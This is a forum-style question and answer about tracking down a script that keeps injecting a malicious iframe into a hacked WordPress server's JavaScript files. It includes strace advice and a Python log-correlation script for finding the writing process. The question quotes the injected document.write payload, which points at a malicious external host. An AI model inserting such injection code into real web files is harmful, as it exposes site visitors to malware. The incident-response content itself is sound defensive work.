
Possible Duplicate:
My server’s been hacked EMERGENCY

A server of mine recently suffered a malware attack. I've since cleaned the server up a bit, upgraded a variety of WordPress installs and TimThumb files, and removed a lot of old and archived directories. My host (DreamHost) agrees that all the big wide open gaping vulnerabilities are closed.

Now I just need to find the source of the malware. Somewhere on my server, a script is adding an iframe injection to all my javascript files. It happens every few minutes. Here's an example of the injection, though this changes sometimes:

document.write('<iframe src="http://wbjsb.myddns.com/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');

If I remove this, it comes back in about 5 minutes.

Any thoughts on how to hunt down the script that is making these changes? Thanks!

PJ.

1 Answer


If the malware is a script that is actually being executed by the web server, you could attempt to use strace to see what files are being opened and/or written to by the web server process/script interpreter based on system calls being made. It's a little low-level, but it works. (This depends on the server, scripting language, and forking model being used). You'd probably want to stick strace on the script interpreter (using php as an example, e.g. php5-fpm if it's PHP FPM, apache2 if using mod_php5) and could see what files are being opened, e.g. for apache2 with mod_php5:

# strace writes the trace to stderr, so -o is used to capture it to a file
sudo strace -f -o /tmp/strace.log -e open,close,read,write apache2 -k start

or something to that effect, and examine the log. (-f forces strace to follow forks, assuming your Apache is using the prefork MPM, generally the default for mod_php5 installs; -e open restricts output to only the open(2) syscall and friends.) Obviously, this is going to show you every file that the server/PHP is opening, but you can do some grep magic to try and narrow it down.

You could probably narrow down based on the write(2) syscall that is occurring as well with grep (use the -v option to strace to avoid truncating the strings that are getting sent to write(2)).
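The "grep magic" the answer refers to is really a correlation problem: a write(2) line only names a file descriptor, so you have to join it back to the open(2) that produced that descriptor in the same PID. The script below does that join over an `strace -f` log and reports which process wrote an injection marker into a `.js` file, together with the `.php` files that process had opened beforehand (the likely location of the dropper). This is an added example, not code from the answer; the log lines are constructed to look like strace output, the hostname in them is a placeholder, and it assumes the trace was captured with string truncation raised (strace's `-s` option) so the written data is visible.

```python
"""Correlate open()/write() calls in an strace -f log to find which
process writes an injected marker into JavaScript files.

Added example; the log below is constructed, not a real capture."""
import re
import sys
from collections import defaultdict

# Constructed sample of `strace -f` output: one PHP worker (pid 4211)
# serves a page normally, another (pid 4213) loads a dropped script from
# the uploads directory, then reopens a theme .js file for writing and
# appends an iframe injection.  EXAMPLE-INJECT-HOST is a placeholder.
SAMPLE_LOG = """\
[pid  4211] open("/var/www/site/wp-content/themes/x/js/app.js", O_RDONLY) = 7
[pid  4211] read(7, "function init(){}\\n", 4096) = 18
[pid  4211] close(7) = 0
[pid  4213] open("/var/www/site/wp-content/uploads/.cache/run.php", O_RDONLY) = 9
[pid  4213] close(9) = 0
[pid  4213] open("/var/www/site/wp-content/themes/x/js/app.js", O_WRONLY|O_TRUNC, 0666) = 10
[pid  4213] write(10, "function init(){}\\ndocument.write('<iframe src=\\"http://EXAMPLE-INJECT-HOST/x.cgi?6\\" width=\\"11\\"></iframe>');", 104) = 104
[pid  4213] close(10) = 0
[pid  4211] write(1, "HTTP/1.1 200 OK", 15) = 15
"""

# "[pid N] call(args) = ret"; the pid prefix is absent when strace traces a
# single process, so it is optional here.
LINE_RE = re.compile(r'^(?:\[pid\s+(\d+)\]\s+)?(\w+)\((.*)\)\s+=\s+(-?\d+)')
OPEN_RE = re.compile(r'^"((?:[^"\\]|\\.)*)",\s*([A-Z_|]+)')   # "path", FLAGS
WRITE_RE = re.compile(r'^(\d+),\s*"((?:[^"\\]|\\.)*)"')      # fd, "data"
CLOSE_RE = re.compile(r'^(\d+)\s*$')                           # fd


def find_js_writers(log_text, marker="<iframe", js_suffix=".js"):
    """Return [(pid, js_path, php_files_opened_by_that_pid), ...] for every
    write() of `marker` into a file ending in `js_suffix`."""
    fd_table = defaultdict(dict)   # pid -> {fd: path} for currently open fds
    opened = defaultdict(list)     # pid -> every path it opened, in order
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid_s, call, args, ret_s = m.groups()
        pid, ret = (int(pid_s) if pid_s else 0), int(ret_s)
        if call in ("open", "openat"):
            if call == "openat":
                args = args.split(", ", 1)[1]   # drop the dirfd (AT_FDCWD) argument
            om = OPEN_RE.match(args)
            if om and ret >= 0:                 # a negative return is a failed open
                path = om.group(1)
                fd_table[pid][ret] = path
                opened[pid].append(path)
        elif call == "write":
            wm = WRITE_RE.match(args)
            if not wm:
                continue
            fd, data = int(wm.group(1)), wm.group(2)
            path = fd_table[pid].get(fd)        # join the fd back to its open()
            if path and path.endswith(js_suffix) and marker in data:
                scripts = [p for p in opened[pid] if p.endswith(".php")]
                findings.append((pid, path, scripts))
        elif call == "close":
            cm = CLOSE_RE.match(args)
            if cm:
                fd_table[pid].pop(int(cm.group(1)), None)
    return findings


if __name__ == "__main__":
    # Usage: python3 find_js_writers.py /tmp/strace.log  (defaults to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for pid, js_path, scripts in find_js_writers(text):
        print(f"pid {pid} wrote the marker into {js_path}")
        for p in scripts:
            print(f"    earlier opened script: {p}")
```

On a real trace the `.php` paths listed for the offending PID are the first place to look: with mod_php every request is one prefork child, so the script that was included just before the `.js` file was opened for writing is usually the one doing the injecting. If you see the same behaviour from a PID that opened nothing under the web root, the writer is likely a cron job or a stray daemon rather than the web server, and `strace -p` on that PID (or `ps -o pid,ppid,cmd`) is the next step.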